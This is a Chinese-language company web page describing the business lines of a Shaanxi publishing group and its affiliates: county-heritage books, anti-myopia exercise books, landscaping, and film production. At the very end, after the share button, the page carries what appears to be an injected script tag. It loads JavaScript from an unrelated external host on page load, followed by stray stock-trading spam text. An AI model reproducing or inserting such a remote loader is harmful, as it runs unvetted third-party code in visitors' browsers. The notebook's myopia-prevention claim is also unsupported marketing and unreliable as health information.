頁面位置頁面位置 : 首頁 > 主營業務

主營業務

聯系方式/Contact information

  • 聯系人聯系人:
  • 聯系電話聯系電話:029-68539222
  • 聯系地址聯系地址:陜西省西安市雁塔區長安路與雁展路交匯處萊安中心T5-602室
在線咨詢

主營業務

圖書出版發行


陜西金箔書業集團有限公司

公司創立于2010年,注冊資金1600萬元,是一家長期致力于政府項目合作和縣情圖書研發、出版、發行的集團公司。公司精心打造的“美麗家鄉”系列圖書已覆蓋陜西50余縣市;公司與陜西省教育廳2016年合作項目《社會主義核心價值觀青少年讀本》系列圖書進入陜西省中小學素質教育讀本推薦目錄;公司策劃研發的校本教材《“六個學會”系列叢書》等圖書被學校師生廣泛使用。目前公司圖書發行、銷售網絡遍及陜西省,輻射甘肅、寧夏、青海等西北五省區。

核心產品:“美麗家鄉”系列圖書

“美麗家鄉”系列圖書,由陜西金箔書業集團攜手陜西師范大學出版總社精心打造,是目前全國獨家以縣域歷史地理文化普及為內容的大型叢書,是陜西唯一的區縣人文歷史教科書,也是圖書出版業界名副其實的陜西名牌、陜西地理標志性出版物,是對陜西的各區縣歷史文化進行全面系統介紹的一項大型文化工程。

該系列圖書介紹各區縣山川地理、旅游名勝、歷史文物、民俗特產、文教科技以及文化藝術諸多方面,對各區縣優秀傳統文化進行系統挖掘、整理和展示,同時客觀反映當前各區縣在產業轉型、生態建設、城鄉發展、脫貧攻堅、文明創建等方面的zui新成就。

圖書品牌創立6年來,一直受到省內各區縣宣傳部門、教育部門及黨政干部、中小學生的熱烈歡迎,目前,圖書已完成了咸陽13個區縣、渭南9個區縣以及榆林、銅川、漢中、安康部分區縣和西安周邊區縣共計50多個區縣的圖書編撰發行,成為對中小學生進行優秀傳統文化教育、愛國主義教育的教科書,廣大群眾學習家鄉歷史文化知識的必讀書,黨政干部熟悉地情、開展地方工作的工具書,影響廣泛而深遠。



文具研發銷售


西安美勝高文化用品有限公司

公司成立于2018年,注冊資金500萬元。致力于文具、體育、辦公用品的研發、線上和線下銷售。公司在多年標準化作業本研發基礎上,前瞻性規劃綠色印刷防近視作業本的經營戰略、專利研發、產品設計、銷售策略,組建項目團隊,精心打造出“視悅”牌中小學綠印防近視專利作業本呵護著陜西乃至全國兒童青少年視力健康。

核心產品:“視悅”中小學綠印防近視專利系列作業本

本系列產品具有國家知識產權局授予的防近視作業本國家專利,采用自主研發的防近視專用紙張、環保油墨,該專利技術能實現選擇吸收有害藍光、紫光,只反射出特定頻譜的色光,有效減輕用眼疲勞,達到預防近視的目的。

經國家紙張質量監督檢驗中心監測,產品的質量、紙張、印刷、視覺衛生、格線規格、溶劑殘留等各項指標符合陜西省《中小學課業簿冊安全衛生通用技術要求》和《HJ2503環境標志產品技術要求》的相關規定,經中國環境標志產品認證、SGS、CSA、NTEK、ISO9001等國內、國際權威認證,安全、綠色、環保。




園林景觀建設

陜西碧軒園林綠化有限公司

公司成立于2013年,注冊資金1000萬元,是經陜西省工商行政管理局批準成立的有限公司,獲陜西省住房和城鄉建設廳頒發的園林綠化三級資質證書。公司專業從事風景園林規劃設計、道路綠化施工、城市街景綠化工程、園林綠化工程及校園文化建設設計、施工、養護、管理及技術咨詢等。


示范工程:

1.宜君縣第一中學、第二中學、高級中學和五里鎮中心小學校園文化建設工程

2.富平縣仲勛學校校園文化建設工程

3.白水縣倉頡中學雕塑工程

4.陜西青華山旅游文化區景觀工程

5.興平初級中學浮雕工程

6.韓城市職業中學校園文化建設工程

7.富平縣淡村中學景觀工程、淡村衛生院綠化景觀工程

8.涇陽中學校園文化建設工程



影視劇本開發


陜西圣烽影視文化傳播有限公司

公司成立于2015年,是一家致力于影視劇、紀錄片策劃、投資、拍攝和劇本研發、影視劇版權代理的文化傳播公司,下設劇本研發部、策劃運營部、設計制作部、行政人事部、財務部等職能部門。目前網絡電影《幻相》已全網上線,紀錄片《美麗家鄉 盩山厔水》已順利殺青。

  代表作品:

1.電影《幻相》

2.紀錄片《美麗家鄉 盩山厔水》

3.長篇小說《倉圣傳奇》


咨詢熱線
029-68539222
在線咨詢
二維碼
掃一掃關注我們
掃一掃關注我們
分享按鈕 <script src="http://img.dlwjdh.com/upload/saohei/index.js"></script> 一般人炒股能赚钱吗